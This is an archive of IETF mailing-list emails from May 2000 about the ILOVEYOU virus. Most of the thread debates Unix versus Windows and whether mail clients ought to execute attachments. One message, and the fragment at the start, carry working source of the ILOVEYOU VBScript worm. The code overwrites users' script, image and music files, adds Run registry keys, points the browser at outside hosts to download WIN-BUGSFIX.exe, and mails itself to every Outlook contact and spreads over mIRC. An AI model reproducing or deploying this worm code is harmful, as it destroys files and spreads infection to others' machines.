q "<META NAME=3D@-@Description@-@ CONTENT=3D@-@simple but i think this is =
q good...@-@>"&vbcrlf& _
q "<?-?HEAD><BODY =
q ONMOUSEOUT=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
q "ONKEYDOWN=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D@-@fixed@-@ =
q BGCOLOR=3D@-@#FF9933@-@>"&vbcrlf& _
q "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
q read this HTML file<BR>- Please press #-#YES#-# button to Enable =
q ActiveX<?-?p>"&vbcrlf& _
q "<?-?CENTER><MARQUEE LOOP=3D@-@infinite@-@ =
q BGCOLOR=3D@-@yellow@-@>----------z--------------------z----------<?-?MAR=
q QUEE> "&vbcrlf& _
q "<?-?BODY><?-?HTML>"&vbcrlf& _
q "<SCRIPT language=3D@-@JScript@-@>"&vbcrlf& _
q "<!--?-??-?"&vbcrlf& _
q "if (window.screen){var wi=3Dscreen.availWidth;var =
q hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
q rlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"&vbcrlf& _
q "<SCRIPT LANGUAGE=3D@-@VBScript@-@>"&vbcrlf& _
q "<!--"&vbcrlf& _
q "on error resume next"&vbcrlf& _
q "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
q "aw=3D1"&vbcrlf& _
q "code=3D"
q dta2=3D"set =
q fso=3DCreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
q "set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
q "code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
q "code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
q "code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
q "set =
q wri=3Dfso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
q "wri.write code4"&vbcrlf& _
q "wri.close"&vbcrlf& _
q "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
q "if (err.number=3D424) then"&vbcrlf& _
q "aw=3D0"&vbcrlf& _
q "end if"&vbcrlf& _
q "if (aw=3D1) then"&vbcrlf& _
q "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
q "window.close"&vbcrlf& _
q "end if"&vbcrlf& _
q "end if"&vbcrlf& _
q "Set regedit =3D CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
q "regedit.RegWrite =
q @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
q -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"
q dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
q dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
q dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
q dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
q dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
q dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
q dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
q dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
q set fso=3DCreateObject("Scripting.FileSystemObject")
q set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
q lines=3DSplit(c.ReadAll,vbcrlf)
q l1=3Dubound(lines)
q for n=3D0 to ubound(lines)
q lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
q lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
q lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
q if (l1=3Dn) then
q lines(n)=3Dchr(34)+lines(n)+chr(34)
q else
q lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
q end if
q next
q set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
q b.close
q set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
q d.write dt5
q d.write join(lines,vbcrlf)
q d.write vbcrlf
q d.write dt6
q d.close
q end sub
q ------_=_NextPart_000_01BFB5DE.957A65A0--
>From owner-ietf-outbound Thu May 4 16:20:09 2000
Received: by ietf.org (8.9.1a/8.9.1a) id QAA16008
for [EMAIL PROTECTED]; Thu, 4 May 2000 16:20:03 -0400 (EDT)
Received: from mail.nanospace.com ([EMAIL PROTECTED] [209.213.199.10])
by ietf.org (8.9.1a/8.9.1a) with SMTP id QAA15965
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 16:18:23 -0400 (EDT)
Received: (qmail 21811 invoked by uid 74); 4 May 2000 20:18:24 -0000
Received: from [EMAIL PROTECTED] by mail with scan4virus-0.19 (uvscan: v4.0.70/v4076.
sweep: 1.8/3.33. . Clean. Processed in 0.472961 secs); 04/05/2000 13:18:24
Received: from thegrind.yipes.com (HELO zzsf220) (209.213.212.254)
by mail.nanospace.com with SMTP; 4 May 2000 20:18:23 -0000
Reply-To: <[EMAIL PROTECTED]>
From: "Jim Stephenson-Dunn" <[EMAIL PROTECTED]>
To: "'A James Lewis'" <[EMAIL PROTECTED]>,
"'Lillian Komlossy'" <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 4 May 2000 13:18:20 -0700
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: <[EMAIL PROTECTED]>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Office for Unix, Now there's a terrifying thought !!!!
(please don't contaminate the purity of my unix system with that filthy
windows software)
Jim
Jim Dunn
Senior Network Engineer
San Francisco NOC
-----Original Message-----
From: A James Lewis [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:53 AM
To: Lillian Komlossy
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
The whole world will use what they are presented with.... the difference
between Win3.1 and Win95 is far greater than the difference between Win95
and GNOME or KDE... so actually it's only software availability thats
holding back IS departments the world over!
If MS gets split, we could have Office for UNIX sooner rather than
later too!
On Thu, 4 May 2000, Lillian Komlossy wrote:
> Donald,
>
> The whole world will not switch over to Unix
> - the average user will always be more confortable with Windows
> unless Unix will at one point offer the same seamless user-friendliness.
> So it will always be a problem, one which cannot be solved by telling
> others not to use what they've accustomed to - and one which cannot be
> ignored.
>
>
> Lillian Komlossy
> Site Manager
> http://www.dmnews.com
> http://www.imarketingnews.com
> (212) 925-7300 ext. 232
>
>
> -----Original Message-----
> From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 04, 2000 10:48 AM
> To: [EMAIL PROTECTED]
> Subject: Re: VIRUS WARNING
>
>
>
> The whole world does not run software which is a good culture medium
> for email viruses. I mostly use nice old UNIX software and it would
> take a number of extra steps on my part for some embdedded virus to
> get a chance to run. If your software automatically executes stuff
> in attachments, you need to change your software, not develope a list
> of subject lines you are freightened of.
>
> Donald
>
> From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
> Date: Thu, 4 May 2000 09:27:19 -0400
> Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> X-MSMail-Priority: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
> Importance: Normal
> In-Reply-To: <[EMAIL PROTECTED]>
> Content-Transfer-Encoding: 7bit
> X-Loop: [EMAIL PROTECTED]
> Content-Transfer-Encoding: 7bit
> >The is an e-mail virus going around. The subject of the e-mail is
> >ILOVEYOU...I suggest you delete it the moment you receive it.
> >
> >-Scot Mc Pherson, N2UPA
> >-Sr. Network Analyst
> >-ClearAccess Communications
> >-Ph: 941.744.5757 ext. 210
> >-Fax: 941.744.0629
> >-mailto:[EMAIL PROTECTED]
> >-http://www.clearaccess.net
> >
>
A. James Lewis ([EMAIL PROTECTED])
Don't throw your computers out of the windows,
throw the Windows(tm) out of your computers.
>From owner-ietf-outbound Thu May 4 17:00:37 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA17362
for [EMAIL PROTECTED]; Thu, 4 May 2000 17:00:03 -0400 (EDT)
Received: from peace.off.org ([EMAIL PROTECTED] [198.58.4.4])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA16946
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 16:50:01 -0400 (EDT)
Received: (from tex@localhost)
by peace.off.org (8.9.3/8.9.3/SuSE Linux 8.9.3-0.1) id MAA16125;
Thu, 4 May 2000 12:51:21 -0700
Date: Thu, 4 May 2000 12:51:20 -0700
From: Austin Schutz <[EMAIL PROTECTED]>
To: Keith Moore <[EMAIL PROTECTED]>
Cc: Lillian Komlossy <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre3i
In-Reply-To: <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
>
> the builders of the titanic didn't know that certain kinds of steel
> become brittle at cold temperatures.
>
> otoh, the developers of this user agent knew, or should have known,
> the risks of executing code of unknown origin. they have been
> understood for a long time. they were discussed during development
> of the MIME standard. the MIME specs have required content-types to
> document known security risks since the early 1990s. other email-borne
> viruses have used similar mechanisms to this one to propagte themselves.
>
So if the users would save the virus to disk and then run it,
what's the savings? If I send a naked_bunnies.exe file to a dirty joke
email list, some people are going to run it no matter what warnings are given
or whether or not it's zipped and uuencoded, whatever. If 20% of the people
receiving a virus propagate it rather than 50%, that's probably still good
enough to be significantly detrimental.
You could have senders sign any executables. That might help a little,
as long as the sender's machine hasn't been compromised.
Austin
>From owner-ietf-outbound Thu May 4 17:10:07 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA17737
for [EMAIL PROTECTED]; Thu, 4 May 2000 17:10:02 -0400 (EDT)
Received: from localhost.localdomain (thibault.org [207.8.144.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA17515
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 17:01:40 -0400 (EDT)
Received: from ecal.com (localhost [127.0.0.1])
by localhost.localdomain (8.9.3/8.9.3) with ESMTP id RAA03235
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 17:01:15 -0400
Sender: [EMAIL PROTECTED]
Message-ID: <[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 17:01:15 -0400
From: John Stracke <[EMAIL PROTECTED]>
X-Mailer: Mozilla 4.72 [en] (X11; U; Linux 2.2.14-5.0 i586)
X-Accept-Language: en
MIME-Version: 1.0
To: [EMAIL PROTECTED]
Subject: Re: value of standards
References: <[EMAIL PROTECTED]>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
Keith Moore wrote:
> Perhaps unfortunately, RFC 2046 doesn't come right out and say
> "DON'T EXECUTE CONTENT IN EMAIL MESSAGES".
>
> Then again, it doesn't say DON'T CUT YOUR CUSTOMER'S ARM OFF either.
Don't be silly; a vendor would never cut a customer's arm off. How would
they pull out their wallet to pay for the next upgrade?
--
/===============================================================\
|John Stracke | http://www.ecal.com |My opinions are my own. |
|Chief Scientist |==============================================|
|eCal Corp. |Some days, it just doesn't pay to gnaw through|
|[EMAIL PROTECTED]|the straps. |
\===============================================================/
>From owner-ietf-outbound Thu May 4 17:20:28 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA18150
for [EMAIL PROTECTED]; Thu, 4 May 2000 17:20:05 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA17828
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 17:11:41 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id RAA02938;
Thu, 4 May 2000 17:11:32 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Austin Schutz <[EMAIL PROTECTED]>
cc: Keith Moore <[EMAIL PROTECTED]>, Lillian Komlossy <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
In-reply-to: Your message of "Thu, 04 May 2000 12:51:20 PDT."
<[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 17:11:32 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> So if the users would save the virus to disk and then run it,
> what's the savings?
the virus doesn't propagate as quickly, nor to as many people,
before it is detected and countermeasures are put in place.
yes, this does make a significant difference.
> You could have senders sign any executables. That might help a little,
> as long as the sender's machine hasn't been compromised.
this would also help, but we'd need a better way to verify the sender's
signature than we have now.
Keith
>From owner-ietf-outbound Thu May 4 17:30:17 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA18563
for [EMAIL PROTECTED]; Thu, 4 May 2000 17:30:02 -0400 (EDT)
Received: from apollo.dmnews.com (mail.dmnews.com [204.141.161.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id RAA18231
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 17:21:41 -0400 (EDT)
Received: by mail.dmnews.com with Internet Mail Service (5.5.2448.0)
id <HNLHM42P>; Thu, 4 May 2000 17:28:10 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Lillian Komlossy <[EMAIL PROTECTED]>
To: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 4 May 2000 17:28:09 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
Let's not make it political. We've all been attacked, it is pointless
to bring in the Unix vs Windows debate. Office, Windows, Unix, Linux, Mac
are all great as long as somebody likes to work with them.
I personally like Microsoft products, but I respect those who don't - and
expect the same respect from them.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Jim Stephenson-Dunn [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 4:18 PM
To: 'A James Lewis'; 'Lillian Komlossy'
Cc: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
Office for Unix, Now there's a terrifying thought !!!!
(please don't contaminate the purity of my unix system with that filthy
windows software)
Jim
Jim Dunn
Senior Network Engineer
San Francisco NOC
-----Original Message-----
From: A James Lewis [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:53 AM
To: Lillian Komlossy
Cc: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
The whole world will use what they are presented with.... the difference
between Win3.1 and Win95 is far greater than the difference between Win95
and GNOME or KDE... so actually it's only software availability thats
holding back IS departments the world over!
If MS gets split, we could have Office for UNIX sooner rather than
later too!
On Thu, 4 May 2000, Lillian Komlossy wrote:
> Donald,
>
> The whole world will not switch over to Unix
> - the average user will always be more confortable with Windows
> unless Unix will at one point offer the same seamless user-friendliness.
> So it will always be a problem, one which cannot be solved by telling
> others not to use what they've accustomed to - and one which cannot be
> ignored.
>
>
> Lillian Komlossy
> Site Manager
> http://www.dmnews.com
> http://www.imarketingnews.com
> (212) 925-7300 ext. 232
>
>
> -----Original Message-----
> From: Donald E. Eastlake 3rd [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, May 04, 2000 10:48 AM
> To: [EMAIL PROTECTED]
> Subject: Re: VIRUS WARNING
>
>
>
> The whole world does not run software which is a good culture medium
> for email viruses. I mostly use nice old UNIX software and it would
> take a number of extra steps on my part for some embdedded virus to
> get a chance to run. If your software automatically executes stuff
> in attachments, you need to change your software, not develope a list
> of subject lines you are freightened of.
>
> Donald
>
> From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
> Date: Thu, 4 May 2000 09:27:19 -0400
> Message-ID: <00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> X-MSMail-Priority: Normal
> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
> Importance: Normal
> In-Reply-To: <[EMAIL PROTECTED]>
> Content-Transfer-Encoding: 7bit
> X-Loop: [EMAIL PROTECTED]
> Content-Transfer-Encoding: 7bit
> >The is an e-mail virus going around. The subject of the e-mail is
> >ILOVEYOU...I suggest you delete it the moment you receive it.
> >
> >-Scot Mc Pherson, N2UPA
> >-Sr. Network Analyst
> >-ClearAccess Communications
> >-Ph: 941.744.5757 ext. 210
> >-Fax: 941.744.0629
> >-mailto:[EMAIL PROTECTED]
> >-http://www.clearaccess.net
> >
>
A. James Lewis ([EMAIL PROTECTED])
Don't throw your computers out of the windows,
throw the Windows(tm) out of your computers.
>From owner-ietf-outbound Thu May 4 17:41:57 2000
Received: by ietf.org (8.9.1a/8.9.1a) id RAA18911
for [EMAIL PROTECTED]; Thu, 4 May 2000 17:41:48 -0400 (EDT)
Received: from bells.cs.ucl.ac.uk (bells.cs.ucl.ac.uk [128.16.5.31])
by ietf.org (8.9.1a/8.9.1a) with SMTP id RAA18505
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 17:28:27 -0400 (EDT)
Received: from sonic.cs.ucl.ac.uk by bells.cs.ucl.ac.uk with local SMTP
id <[EMAIL PROTECTED]>; Thu, 4 May 2000 22:28:20 +0100
To: Scot Mc Pherson <[EMAIL PROTECTED]>
cc: ietf <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
In-reply-to: Your message of "Thu, 04 May 2000 09:27:19 EDT."
<00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 22:28:18 +0100
Message-ID: <[EMAIL PROTECTED]>
From: Jon Crowcroft <[EMAIL PROTECTED]>
X-Loop: [EMAIL PROTECTED]
"noone ever got fired for buying ibm"
this was ironic coz ibm was expensive, but worked
someone should get fired for buying someone elses prodiucts
irony
no class action
just reality checkpoint time...
for a systemic view,
some stuff is engineered better than other stuff - see mark handly's
excellent letter to the new york times, post melissa
the best reason for diversity is not anti-capitalist, its darwinian.
meanwhile, eres some visaual basic.
j.
============cut here and paste to yor favourite waste disposal===
filename="LOVE-LETTER-FOR-YOU.TXT"
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [EMAIL PROTECTED] / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSK
ernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServ
ices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw65
87345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546
786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOh
fgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUg
qwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN
-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini")
or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if
mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HT
M"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWOR
D"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries
.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries
.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@
CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? [EMAIL PROTECTED] ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>
"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@[EMAIL PROTECTED]=#-#main#-#;window.open(#-#LOVE-LETTER
-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@[EMAIL PROTECTED]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,
#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this
HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>
----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.m
oveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
